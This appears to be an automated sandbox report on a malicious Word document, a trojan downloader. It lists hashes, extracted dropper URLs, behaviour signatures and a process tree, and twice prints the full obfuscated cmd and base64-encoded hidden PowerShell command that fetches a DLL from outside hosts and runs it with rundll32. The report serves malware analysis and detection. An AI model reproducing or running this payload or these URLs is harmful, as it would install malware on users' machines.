042726b5d5ae27f0edc4d8426752dd0ea0377f14374bd307c381507615e3023d

General

Target

SecuriteInfo.com.VB.Trojan.Downloader.JVAZ.20129.20519.doc
Size

103KB
MD5

91a695ded57d874bd242f32912d65cff
SHA1

caa5283145f5680703e7b610645e2c25b6ebedb6
SHA256

042726b5d5ae27f0edc4d8426752dd0ea0377f14374bd307c381507615e3023d
SHA512

905a293081458894d69e0d4701fda1222671833c9e76164ba5e8680cd51ebac3617ec44e2c37a2473d2d220efea3a5a41c13d6da925306db45bec76a123fa0f0

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://angel2gether.de/BlutEngel/SpeechEngines/

exe.dropper

http://holonchile.cl/cgi-bin/System32/

exe.dropper

http://members.nlbformula.com/cgi-bin/Microsoft.NET/

exe.dropper

http://akybron.hu/wordpress/Triedit/

exe.dropper

https://norailya.com/drupal/4zKMm/

exe.dropper

http://giannaspsychicstudio.com/cgi-bin/Systems/

Signatures

Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.exe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1628 1400 cmd.exe
Blocklisted process makes network request 4 IoCs

Processes:

powershell.exerundll32.exe

flow pid process

7 540 powershell.exe
9 1416 rundll32.exe
12 1416 rundll32.exe
13 1416 rundll32.exe
Loads dropped DLL 4 IoCs

Processes:

rundll32.exe

pid process

324 rundll32.exe
324 rundll32.exe
324 rundll32.exe
324 rundll32.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1628	1400	cmd.exe

flow	pid	process
7	540	powershell.exe
9	1416	rundll32.exe
12	1416	rundll32.exe
13	1416	rundll32.exe

pid	process
324	rundll32.exe
324	rundll32.exe
324	rundll32.exe
324	rundll32.exe

Drops file in System32 directory 2 IoCs

Processes:

powershell.exerundll32.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\Mcjnlmmkdk\nzkabsqwy.beg	rundll32.exe

Drops file in Windows directory 1 IoCs

Processes:

WINWORD.EXE

description ioc process

File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE
Office loads VBA resources, possible macro or embedded object present

description	ioc	process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

Modifies Internet Explorer settings 1 TTPs 9 IoCs

adware spyware

Modify Registry

T1112

Processes:

WINWORD.EXE

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

1204 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exerundll32.exe

pid process

540 powershell.exe
540 powershell.exe
1416 rundll32.exe
1416 rundll32.exe
1416 rundll32.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 540 powershell.exe
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

WINWORD.EXE

pid process

1204 WINWORD.EXE
1204 WINWORD.EXE

pid	process
1204	WINWORD.EXE

pid	process
540	powershell.exe
540	powershell.exe
1416	rundll32.exe
1416	rundll32.exe
1416	rundll32.exe

description	pid	process
Token: SeDebugPrivilege	540	powershell.exe

pid	process
1204	WINWORD.EXE
1204	WINWORD.EXE

Suspicious use of WriteProcessMemory 23 IoCs

Processes:

cmd.exepowershell.exerundll32.exerundll32.exe

description	pid	process	target process
PID 1628 wrote to memory of 620	1628	cmd.exe	msg.exe
PID 1628 wrote to memory of 620	1628	cmd.exe	msg.exe
PID 1628 wrote to memory of 620	1628	cmd.exe	msg.exe
PID 1628 wrote to memory of 540	1628	cmd.exe	powershell.exe
PID 1628 wrote to memory of 540	1628	cmd.exe	powershell.exe
PID 1628 wrote to memory of 540	1628	cmd.exe	powershell.exe
PID 540 wrote to memory of 1368	540	powershell.exe	rundll32.exe
PID 540 wrote to memory of 1368	540	powershell.exe	rundll32.exe
PID 540 wrote to memory of 1368	540	powershell.exe	rundll32.exe
PID 1368 wrote to memory of 324	1368	rundll32.exe	rundll32.exe
PID 1368 wrote to memory of 324	1368	rundll32.exe	rundll32.exe
PID 1368 wrote to memory of 324	1368	rundll32.exe	rundll32.exe
PID 1368 wrote to memory of 324	1368	rundll32.exe	rundll32.exe
PID 1368 wrote to memory of 324	1368	rundll32.exe	rundll32.exe
PID 1368 wrote to memory of 324	1368	rundll32.exe	rundll32.exe
PID 1368 wrote to memory of 324	1368	rundll32.exe	rundll32.exe
PID 324 wrote to memory of 1416	324	rundll32.exe	rundll32.exe
PID 324 wrote to memory of 1416	324	rundll32.exe	rundll32.exe
PID 324 wrote to memory of 1416	324	rundll32.exe	rundll32.exe
PID 324 wrote to memory of 1416	324	rundll32.exe	rundll32.exe
PID 324 wrote to memory of 1416	324	rundll32.exe	rundll32.exe
PID 324 wrote to memory of 1416	324	rundll32.exe	rundll32.exe
PID 324 wrote to memory of 1416	324	rundll32.exe	rundll32.exe

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.VB.Trojan.Downloader.JVAZ.20129.20519.doc"
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1204

C:\Windows\system32\cmd.exe
cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgACQAbAB1AE4AOQBjAFgAPQBbAHQAWQBwAGUAXQAoACIAewAyAH0AewAwAH0AewAzAH0AewA0AH0AewAxAH0AIgAgAC0ARgAnAEUATQAuAEkATwAnACwAJwB5ACcALAAnAFMAWQBzAFQAJwAsACcALgBEAEkAcgBFAEMAVAAnACwAJwBPAHIAJwApACAAOwAgACAAUwBlAHQAIAAgACgAJwBMADQAYQAnACsAJwBIACcAKQAgACgAWwBUAHkAUABlAF0AKAAiAHsANgB9AHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsANwB9AHsANQB9AHsAMwB9ACIAIAAtAGYAJwBFACcALAAnAEUAdAAuAFMARQByAFYAaQBjAGUAcAAnACwAJwBUACcALAAnAGUAUgAnACwAJwBtAC4AbgAnACwAJwBBAE4AYQBnACcALAAnAFMAeQBTACcALAAnAG8AaQBuAHQAbQAnACkAIAAgACkAIAA7ACAAJABEAHAAXwBqAG0AYgB0AD0AJABFADcAOABMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABJADAANQBRADsAJABYADUANQBOAD0AKAAnAFEANAAnACsAJwA4AEsAJwApADsAIAAgACQATAB1AE4AOQBDAFgAOgA6ACIAYwBSAGAAZQBhAFQAYABFAGQASQBSAGAARQBgAGMAdABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAAnACsAJwB9ACcAKwAnAEwAJwArACcAbQBsADMAeABiAG4AewAwACcAKwAnAH0AVQA2AGgAdwAnACsAKAAnAGcAbAAnACsAJwBuACcAKQArACcAewAwAH0AJwApAC0AZgBbAEMAaABhAHIAXQA5ADIAKQApADsAJABDADUANQBXAD0AKAAoACcATAA4ACcAKwAnADUAJwApACsAJwBXACcAKQA7ACAAKABnAEUAVAAtAFYAYQByAEkAYQBiAEwARQAgACAAKAAnAGwANABhACcAKwAnAEgAJwApACAAIAAtAFYAYQBMAFUARQBvAG4AKQA6ADoAIgBTAGUAYwBgAFUAcgBpAHQAWQBgAHAAcgBvAHQAYABPAGMAbwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABKADAAMQBNAD0AKAAnAFMANAAnACsAJwAxAEYAJwApADsAJABYADYAbABzAGkAYgBiACAAPQAgACgAJwBMAF8AJwArACcAMgBGACcAKQA7ACQAWAA1ADQAUAA9ACgAJwBHADYAJwArACcAXwBZACcAKQA7ACQAUgA3ADIANQAzAG8AZQA9ACQASABPAE0ARQArACgAKAAnAHsAMAB9AEwAJwArACgAJwBtACcAKwAnAGwAMwB4AGIAJwArACcAbgAnACkAKwAnAHsAMAAnACsAJwB9AFUANgBoAHcAZwBsACcAKwAnAG4AJwArACcAewAnACsAJwAwACcAKwAnAH0AJwApACAAIAAtAEYAIAAgAFsAQwBoAEEAcgBdADkAMgApACsAJABYADYAbABzAGkAYgBiACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABWADMAOQBZAD0AKAAnAFEANgAnACsAJwA2AEUAJwApADsAJABYAGwAdwB2AGwAaAA2AD0AKAAnAHcAJwArACcAXQAnACsAKAAnAHgAbQBbACcAKwAnAHYAOgAnACkAKwAoACcALwAvACcAKwAnAGEAJwApACsAKAAnAG4AZwAnACsAJwBlAGwAMgBnACcAKQArACgAJwBlAHQAJwArACcAaAAnACkAKwAnAGUAcgAnACsAKAAnAC4AZAAnACsAJwBlAC8AQgBsACcAKQArACcAdQB0ACcAKwAnAEUAJwArACgAJwBuAGcAZQAnACsAJwBsACcAKQArACgAJwAvAFMAcABlAGUAJwArACcAYwBoAEUAJwArACcAbgAnACkAKwAoACcAZwBpAG4AZQBzACcAKwAnAC8AQAAnACsAJwB3AF0AeABtAFsAdgA6ACcAKQArACcALwAnACsAKAAnAC8AaABvAGwAJwArACcAbwBuACcAKQArACcAYwAnACsAKAAnAGgAJwArACcAaQAnACsAJwBsAGUALgAnACsAJwBjAGwALwBjAGcAJwArACcAaQAtAGIAJwArACcAaQBuAC8AUwB5ACcAKQArACgAJwBzAHQAJwArACcAZQBtACcAKQArACgAJwAzADIAJwArACcALwBAAHcAJwApACsAKAAnAF0AJwArACcAeABtACcAKQArACgAJwBbACcAKwAnAHYAOgAnACkAKwAnAC8AJwArACcALwAnACsAKAAnAG0AZQBtAGIAZQAnACsAJwByACcAKQArACgAJwBzAC4AJwArACcAbgAnACkAKwAoACcAbABiAGYAbwAnACsAJwByAG0AdQBsACcAKwAnAGEALgBjAG8AbQAvAGMAJwArACcAZwAnACkAKwAoACcAaQAnACsAJwAtAGIAJwApACsAKAAnAGkAbgAvACcAKwAnAE0AJwApACsAKAAnAGkAYwByAG8AcwAnACsAJwBvACcAKQArACcAZgB0ACcAKwAnAC4AJwArACgAJwBOAEUAVAAnACsAJwAvACcAKwAnAEAAdwAnACkAKwAnAF0AJwArACcAeAAnACsAKAAnAG0AJwArACcAWwB2ACcAKQArACgAJwA6ACcAKwAnAC8ALwAnACkAKwAoACcAYQBrACcAKwAnAHkAJwApACsAKAAnAGIAcgAnACsAJwBvAG4AJwApACsAJwAuACcAKwAnAGgAdQAnACsAKAAnAC8AdwAnACsAJwBvACcAKQArACgAJwByACcAKwAnAGQAcAByACcAKwAnAGUAcwBzACcAKwAnAC8AVAByAGkAZQBkAGkAJwApACsAKAAnAHQALwAnACsAJwBAACcAKQArACcAdwAnACsAKAAnAF0AJwArACcAeABtAFsAdgAnACsAJwBzACcAKQArACgAJwA6ACcAKwAnAC8ALwBuAG8AcgAnACsAJwBhAGkAbAAnACkAKwAoACcAeQAnACsAJwBhAC4AYwAnACkAKwAnAG8AJwArACgAJwBtACcAKwAnAC8AZAAnACsAJwByACcAKwAnAHUAcAAnACsAJwBhAGwAJwArACcALwA0AHoASwBNAG0ALwBAAHcAXQAnACsAJwB4AG0AJwApACsAKAAnAFsAJwArACcAdgAnACsAJwA6AC8ALwBnAGkAYQAnACsAJwBuAG4AYQBzACcAKQArACcAcABzACcAKwAnAHkAYwAnACsAKAAnAGgAaQAnACsAJwBjACcAKQArACgAJwBzAHQAJwArACcAdQAnACkAKwAoACcAZAAnACsAJwBpAG8AJwApACsAJwAuACcAKwAnAGMAbwAnACsAJwBtAC8AJwArACgAJwBjACcAKwAnAGcAaQAtAGIAaQAnACkAKwAoACcAbgAvACcAKwAnAFMAeQAnACkAKwAnAHMAdAAnACsAJwBlAG0AJwArACcAcwAnACsAJwAvACcAKQAuACIAUgBFAGAAcABMAGEAYABDAGUAIgAoACgAJwB3ACcAKwAoACcAXQAnACsAJwB4AG0AWwAnACkAKwAnAHYAJwApACwAKABbAGEAcgByAGEAeQBdACgAKAAnAGQAJwArACgAJwBzAGUAJwArACcAdwBmACcAKQApACwAKAAoACcAdwBlACcAKwAnAHYAJwApACsAJwB3AGUAJwApACkALAAoACgAJwBhAGUAJwArACcAZgAnACkAKwAnAGYAJwApACwAKAAnAGgAdAAnACsAJwB0AHAAJwApACkAWwAyAF0AKQAuACIAcwBQAEwAYABJAHQAIgAoACQAQwA1AF8ATAAgACsAIAAkAEQAcABfAGoAbQBiAHQAIAArACAAJABIADQANQBJACkAOwAkAEUAMwAyAFQAPQAoACcAQQA1ACcAKwAnADkASAAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEwAegBfAGMANgBwADIAIABpAG4AIAAkAFgAbAB3AHYAbABoADYAKQB7AHQAcgB5AHsAKAAmACgAJwBOACcAKwAnAGUAdwAnACsAJwAtAE8AYgBqAGUAJwArACcAYwB0ACcAKQAgAFMAWQBTAFQARQBtAC4AbgBFAFQALgBXAEUAQgBDAEwASQBFAG4AVAApAC4AIgBkAGAATwB3AGAATgBsAG8AQQBkAGAARgBpAGwAZQAiACgAJABMAHoAXwBjADYAcAAyACwAIAAkAFIANwAyADUAMwBvAGUAKQA7ACQAVwAwADIAQgA9ACgAKAAnAE0ANgAnACsAJwAyACcAKQArACcAVQAnACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQBJAHQAZQBtACcAKQAgACQAUgA3ADIANQAzAG8AZQApAC4AIgBMAGAAZQBOAGAAZwBUAGgAIgAgAC0AZwBlACAAMwA5ADAANwAyACkAIAB7ACYAKAAnAHIAdQBuACcAKwAnAGQAbABsADMAMgAnACkAIAAkAFIANwAyADUAMwBvAGUALAAoACcAUwAnACsAKAAnAGgAJwArACcAbwB3ACcAKQArACcARABpACcAKwAoACcAYQAnACsAJwBsAG8AZwBBACcAKQApAC4AIgBUAG8AcwB0AFIAYABJAGAATgBHACIAKAApADsAJABLAF8AMgBBAD0AKAAnAEwAMAAnACsAJwAxAEgAJwApADsAYgByAGUAYQBrADsAJABDADcAXwBHAD0AKAAoACcAQgAnACsAJwAxADQAJwApACsAJwBMACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUwAzADEARgA9ACgAJwBJAF8AJwArACcAMgBDACcAKQA=
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1628

C:\Windows\system32\msg.exe
msg Admin /v Word experienced an error trying to open the file.
2⤵
PID:620

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -w hidden -enc IAAgACQAbAB1AE4AOQBjAFgAPQBbAHQAWQBwAGUAXQAoACIAewAyAH0AewAwAH0AewAzAH0AewA0AH0AewAxAH0AIgAgAC0ARgAnAEUATQAuAEkATwAnACwAJwB5ACcALAAnAFMAWQBzAFQAJwAsACcALgBEAEkAcgBFAEMAVAAnACwAJwBPAHIAJwApACAAOwAgACAAUwBlAHQAIAAgACgAJwBMADQAYQAnACsAJwBIACcAKQAgACgAWwBUAHkAUABlAF0AKAAiAHsANgB9AHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsANwB9AHsANQB9AHsAMwB9ACIAIAAtAGYAJwBFACcALAAnAEUAdAAuAFMARQByAFYAaQBjAGUAcAAnACwAJwBUACcALAAnAGUAUgAnACwAJwBtAC4AbgAnACwAJwBBAE4AYQBnACcALAAnAFMAeQBTACcALAAnAG8AaQBuAHQAbQAnACkAIAAgACkAIAA7ACAAJABEAHAAXwBqAG0AYgB0AD0AJABFADcAOABMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABJADAANQBRADsAJABYADUANQBOAD0AKAAnAFEANAAnACsAJwA4AEsAJwApADsAIAAgACQATAB1AE4AOQBDAFgAOgA6ACIAYwBSAGAAZQBhAFQAYABFAGQASQBSAGAARQBgAGMAdABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAAnACsAJwB9ACcAKwAnAEwAJwArACcAbQBsADMAeABiAG4AewAwACcAKwAnAH0AVQA2AGgAdwAnACsAKAAnAGcAbAAnACsAJwBuACcAKQArACcAewAwAH0AJwApAC0AZgBbAEMAaABhAHIAXQA5ADIAKQApADsAJABDADUANQBXAD0AKAAoACcATAA4ACcAKwAnADUAJwApACsAJwBXACcAKQA7ACAAKABnAEUAVAAtAFYAYQByAEkAYQBiAEwARQAgACAAKAAnAGwANABhACcAKwAnAEgAJwApACAAIAAtAFYAYQBMAFUARQBvAG4AKQA6ADoAIgBTAGUAYwBgAFUAcgBpAHQAWQBgAHAAcgBvAHQAYABPAGMAbwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABKADAAMQBNAD0AKAAnAFMANAAnACsAJwAxAEYAJwApADsAJABYADYAbABzAGkAYgBiACAAPQAgACgAJwBMAF8AJwArACcAMgBGACcAKQA7ACQAWAA1ADQAUAA9ACgAJwBHADYAJwArACcAXwBZACcAKQA7ACQAUgA3ADIANQAzAG8AZQA9ACQASABPAE0ARQArACgAKAAnAHsAMAB9AEwAJwArACgAJwBtACcAKwAnAGwAMwB4AGIAJwArACcAbgAnACkAKwAnAHsAMAAnACsAJwB9AFUANgBoAHcAZwBsACcAKwAnAG4AJwArACcAewAnACsAJwAwACcAKwAnAH0AJwApACAAIAAtAEYAIAAgAFsAQwBoAEEAcgBdADkAMgApACsAJABYADYAbABzAGkAYgBiACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABWADMAOQBZAD0AKAAnAFEANgAnACsAJwA2AEUAJwApADsAJABYAGwAdwB2AGwAaAA2AD0AKAAnAHcAJwArACcAXQAnACsAKAAnAHgAbQBbACcAKwAnAHYAOgAnACkAKwAoACcALwAvACcAKwAnAGEAJwApACsAKAAnAG4AZwAnACsAJwBlAGwAMgBnACcAKQArACgAJwBlAHQAJwArACcAaAAnACkAKwAnAGUAcgAnACsAKAAnAC4AZAAnACsAJwBlAC8AQgBsACcAKQArACcAdQB0ACcAKwAnAEUAJwArACgAJwBuAGcAZQAnACsAJwBsACcAKQArACgAJwAvAFMAcABlAGUAJwArACcAYwBoAEUAJwArACcAbgAnACkAKwAoACcAZwBpAG4AZQBzACcAKwAnAC8AQAAnACsAJwB3AF0AeABtAFsAdgA6ACcAKQArACcALwAnACsAKAAnAC8AaABvAGwAJwArACcAbwBuACcAKQArACcAYwAnACsAKAAnAGgAJwArACcAaQAnACsAJwBsAGUALgAnACsAJwBjAGwALwBjAGcAJwArACcAaQAtAGIAJwArACcAaQBuAC8AUwB5ACcAKQArACgAJwBzAHQAJwArACcAZQBtACcAKQArACgAJwAzADIAJwArACcALwBAAHcAJwApACsAKAAnAF0AJwArACcAeABtACcAKQArACgAJwBbACcAKwAnAHYAOgAnACkAKwAnAC8AJwArACcALwAnACsAKAAnAG0AZQBtAGIAZQAnACsAJwByACcAKQArACgAJwBzAC4AJwArACcAbgAnACkAKwAoACcAbABiAGYAbwAnACsAJwByAG0AdQBsACcAKwAnAGEALgBjAG8AbQAvAGMAJwArACcAZwAnACkAKwAoACcAaQAnACsAJwAtAGIAJwApACsAKAAnAGkAbgAvACcAKwAnAE0AJwApACsAKAAnAGkAYwByAG8AcwAnACsAJwBvACcAKQArACcAZgB0ACcAKwAnAC4AJwArACgAJwBOAEUAVAAnACsAJwAvACcAKwAnAEAAdwAnACkAKwAnAF0AJwArACcAeAAnACsAKAAnAG0AJwArACcAWwB2ACcAKQArACgAJwA6ACcAKwAnAC8ALwAnACkAKwAoACcAYQBrACcAKwAnAHkAJwApACsAKAAnAGIAcgAnACsAJwBvAG4AJwApACsAJwAuACcAKwAnAGgAdQAnACsAKAAnAC8AdwAnACsAJwBvACcAKQArACgAJwByACcAKwAnAGQAcAByACcAKwAnAGUAcwBzACcAKwAnAC8AVAByAGkAZQBkAGkAJwApACsAKAAnAHQALwAnACsAJwBAACcAKQArACcAdwAnACsAKAAnAF0AJwArACcAeABtAFsAdgAnACsAJwBzACcAKQArACgAJwA6ACcAKwAnAC8ALwBuAG8AcgAnACsAJwBhAGkAbAAnACkAKwAoACcAeQAnACsAJwBhAC4AYwAnACkAKwAnAG8AJwArACgAJwBtACcAKwAnAC8AZAAnACsAJwByACcAKwAnAHUAcAAnACsAJwBhAGwAJwArACcALwA0AHoASwBNAG0ALwBAAHcAXQAnACsAJwB4AG0AJwApACsAKAAnAFsAJwArACcAdgAnACsAJwA6AC8ALwBnAGkAYQAnACsAJwBuAG4AYQBzACcAKQArACcAcABzACcAKwAnAHkAYwAnACsAKAAnAGgAaQAnACsAJwBjACcAKQArACgAJwBzAHQAJwArACcAdQAnACkAKwAoACcAZAAnACsAJwBpAG8AJwApACsAJwAuACcAKwAnAGMAbwAnACsAJwBtAC8AJwArACgAJwBjACcAKwAnAGcAaQAtAGIAaQAnACkAKwAoACcAbgAvACcAKwAnAFMAeQAnACkAKwAnAHMAdAAnACsAJwBlAG0AJwArACcAcwAnACsAJwAvACcAKQAuACIAUgBFAGAAcABMAGEAYABDAGUAIgAoACgAJwB3ACcAKwAoACcAXQAnACsAJwB4AG0AWwAnACkAKwAnAHYAJwApACwAKABbAGEAcgByAGEAeQBdACgAKAAnAGQAJwArACgAJwBzAGUAJwArACcAdwBmACcAKQApACwAKAAoACcAdwBlACcAKwAnAHYAJwApACsAJwB3AGUAJwApACkALAAoACgAJwBhAGUAJwArACcAZgAnACkAKwAnAGYAJwApACwAKAAnAGgAdAAnACsAJwB0AHAAJwApACkAWwAyAF0AKQAuACIAcwBQAEwAYABJAHQAIgAoACQAQwA1AF8ATAAgACsAIAAkAEQAcABfAGoAbQBiAHQAIAArACAAJABIADQANQBJACkAOwAkAEUAMwAyAFQAPQAoACcAQQA1ACcAKwAnADkASAAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEwAegBfAGMANgBwADIAIABpAG4AIAAkAFgAbAB3AHYAbABoADYAKQB7AHQAcgB5AHsAKAAmACgAJwBOACcAKwAnAGUAdwAnACsAJwAtAE8AYgBqAGUAJwArACcAYwB0ACcAKQAgAFMAWQBTAFQARQBtAC4AbgBFAFQALgBXAEUAQgBDAEwASQBFAG4AVAApAC4AIgBkAGAATwB3AGAATgBsAG8AQQBkAGAARgBpAGwAZQAiACgAJABMAHoAXwBjADYAcAAyACwAIAAkAFIANwAyADUAMwBvAGUAKQA7ACQAVwAwADIAQgA9ACgAKAAnAE0ANgAnACsAJwAyACcAKQArACcAVQAnACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQBJAHQAZQBtACcAKQAgACQAUgA3ADIANQAzAG8AZQApAC4AIgBMAGAAZQBOAGAAZwBUAGgAIgAgAC0AZwBlACAAMwA5ADAANwAyACkAIAB7ACYAKAAnAHIAdQBuACcAKwAnAGQAbABsADMAMgAnACkAIAAkAFIANwAyADUAMwBvAGUALAAoACcAUwAnACsAKAAnAGgAJwArACcAbwB3ACcAKQArACcARABpACcAKwAoACcAYQAnACsAJwBsAG8AZwBBACcAKQApAC4AIgBUAG8AcwB0AFIAYABJAGAATgBHACIAKAApADsAJABLAF8AMgBBAD0AKAAnAEwAMAAnACsAJwAxAEgAJwApADsAYgByAGUAYQBrADsAJABDADcAXwBHAD0AKAAoACcAQgAnACsAJwAxADQAJwApACsAJwBMACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUwAzADEARgA9ACgAJwBJAF8AJwArACcAMgBDACcAKQA=
2⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:540

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Users\Admin\Lml3xbn\U6hwgln\L_2F.dll ShowDialogA
3⤵
- Suspicious use of WriteProcessMemory
PID:1368

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Users\Admin\Lml3xbn\U6hwgln\L_2F.dll ShowDialogA
4⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:324

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Mcjnlmmkdk\nzkabsqwy.beg",ShowDialogA
5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:1416

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\Lml3xbn\U6hwgln\L_2F.dll
MD5
238a0e860a00ea4cc8ee2af05f2fbddf

SHA1
9df6ff60eab437a31d0a2117d25663ca6a2f7b73

SHA256
8d750274a3d5721322603b3bb296cc039990b91a9bd2776ed662e0cf70335c24

SHA512
c6a3156ff5efe5fc53962fd1e0e1f1f561a729569656b4e590032ac53d7b0c7c719859e203cfe2d2b39fc29267132c1f6557272243e5c2aaec7a556dadd38210

Download Submit
\Users\Admin\Lml3xbn\U6hwgln\L_2F.dll
MD5
238a0e860a00ea4cc8ee2af05f2fbddf

SHA1
9df6ff60eab437a31d0a2117d25663ca6a2f7b73

SHA256
8d750274a3d5721322603b3bb296cc039990b91a9bd2776ed662e0cf70335c24

SHA512
c6a3156ff5efe5fc53962fd1e0e1f1f561a729569656b4e590032ac53d7b0c7c719859e203cfe2d2b39fc29267132c1f6557272243e5c2aaec7a556dadd38210

Download Submit
\Users\Admin\Lml3xbn\U6hwgln\L_2F.dll
MD5
238a0e860a00ea4cc8ee2af05f2fbddf

SHA1
9df6ff60eab437a31d0a2117d25663ca6a2f7b73

SHA256
8d750274a3d5721322603b3bb296cc039990b91a9bd2776ed662e0cf70335c24

SHA512
c6a3156ff5efe5fc53962fd1e0e1f1f561a729569656b4e590032ac53d7b0c7c719859e203cfe2d2b39fc29267132c1f6557272243e5c2aaec7a556dadd38210

Download Submit
\Users\Admin\Lml3xbn\U6hwgln\L_2F.dll
MD5
238a0e860a00ea4cc8ee2af05f2fbddf

SHA1
9df6ff60eab437a31d0a2117d25663ca6a2f7b73

SHA256
8d750274a3d5721322603b3bb296cc039990b91a9bd2776ed662e0cf70335c24

SHA512
c6a3156ff5efe5fc53962fd1e0e1f1f561a729569656b4e590032ac53d7b0c7c719859e203cfe2d2b39fc29267132c1f6557272243e5c2aaec7a556dadd38210

Download Submit
\Users\Admin\Lml3xbn\U6hwgln\L_2F.dll
MD5
238a0e860a00ea4cc8ee2af05f2fbddf

SHA1
9df6ff60eab437a31d0a2117d25663ca6a2f7b73

SHA256
8d750274a3d5721322603b3bb296cc039990b91a9bd2776ed662e0cf70335c24

SHA512
c6a3156ff5efe5fc53962fd1e0e1f1f561a729569656b4e590032ac53d7b0c7c719859e203cfe2d2b39fc29267132c1f6557272243e5c2aaec7a556dadd38210

Download Submit
memory/324-13-0x0000000000000000-mapping.dmp

Download
memory/540-6-0x000000001ACA0000-0x000000001ACA1000-memory.dmp

Filesize
4KB

Download
memory/540-9-0x000000001C490000-0x000000001C491000-memory.dmp

Filesize
4KB

Download
memory/540-10-0x000000001C610000-0x000000001C611000-memory.dmp

Filesize
4KB

Download
memory/540-8-0x00000000022F0000-0x00000000022F1000-memory.dmp

Filesize
4KB

Download
memory/540-7-0x0000000002650000-0x0000000002651000-memory.dmp

Filesize
4KB

Download
memory/540-5-0x0000000002390000-0x0000000002391000-memory.dmp

Filesize
4KB

Download
